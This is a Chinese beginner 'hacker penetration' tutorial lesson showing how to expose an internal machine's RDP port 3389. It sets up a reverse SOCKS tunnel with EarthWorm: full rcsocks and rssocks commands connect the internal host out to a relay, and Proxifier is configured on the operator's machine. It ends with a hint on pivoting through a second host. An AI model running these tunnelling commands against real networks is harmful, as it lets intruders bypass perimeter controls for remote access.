丸趣教程-黑客渗透入门教程 第六课:如何转发内网机器端口?

276次阅读
没有评论

共计 1176 个字符,预计需要花费 3 分钟才能阅读完成。

丸趣教程 -

如何转发内网的一台机器的 3389 端口。我画了个思维导图,如下:

如果我的机器想要连接内网的 192.168.126.128 的 3389 端口,我们直接连接是连不通的,必须通过一台有公网 IP 的机器为媒介。

我们在 192.168.126.128 机器上,通过工具 EarthWorm 反弹到有公网 IP 机器 192.168.126.135,把 192.168.126.135 做成 socks 服务器。

我们本机再装一个 Proxifier,连接 192.168.126.135,然后 192.168.126.135 就成为我们的一个媒介了,我们就可以直接连到 192.168.126.128 了。

请注意,我把 IP192.168.126.135 都黑体标注了一下,是因为我是在用虚拟机给你写文章演示,在这篇文章中你把 192.168.126.135 这个 IP 当作是一个公网 IP 就行了。说起来很复杂,其实很简单,两个工具操作几步,配合就能完成了。

 

一、在 192.168.126.135 的机器上运行 EarthWorm 监听

命令是:注意看图里的命令。

ew.exe -s rcsocks -l 1080 -e 8888

命令里边的 1080 端口是把 192.168.126.135 做成 socks5 监听的端口,8888 是接收内网机器反弹的端口。这两个端口的数字你可以随便改的。

 

二、内网机器 192.168.126.128 执行命令反弹到 192.168.126.135

命令是:

ew -s rssocks -d 192.168.126.135 -e 8888

此条命令的 8888 端口要和上文的 8888 端口对应。

 

此时,你的 192.168.126.135 的机器就有反应了。

 

三、本机装一个 Proxifier,做好 socks5 规则,打通通道

 

1、点击 Proxifier 配置文件选项的代理服务器,再点填加

 

2、填加 IP192.168.126.135 为 socks5 服务器,1080 端口要和第一条命令的 1080 端口对应。

 

3、现在直接你本机就可以打通了和内网机器 192.168.126.128 的通道了、你可以直接 3389 远程连上了。当然,其它的端口你也可以连上。

 

总结:

方法就是如此的简单。EarthWorm 还有升级版,名字为 Termite,不过更为复杂了,所以我介绍 EarthWorm 给大家使用。EarthWorm 和 Proxifier 都可以百度搜索到,所以我就不提供下载地址了,而且 EarthWorm 有 Linux 版的,运行方法和本文是一样的。

另外,如果内网机器 192.168.126.128 不能上网,你有办法把它的端口转发出来吗?

我给你个提示,如果内网还有一台 192.168.126.127 机器能上网,你完全可能利用 192.168.126.127 把 192.168.126.128 的端口转发出来的,自行去研究一下 EarthWorm 和 Proxifier 吧。

正文完
 
丸趣
版权声明:本站原创文章,由 丸趣 2023-05-12发表,共计1176字。
转载说明:除特殊说明外本站除技术相关以外文章皆由网络搜集发布,转载请注明出处。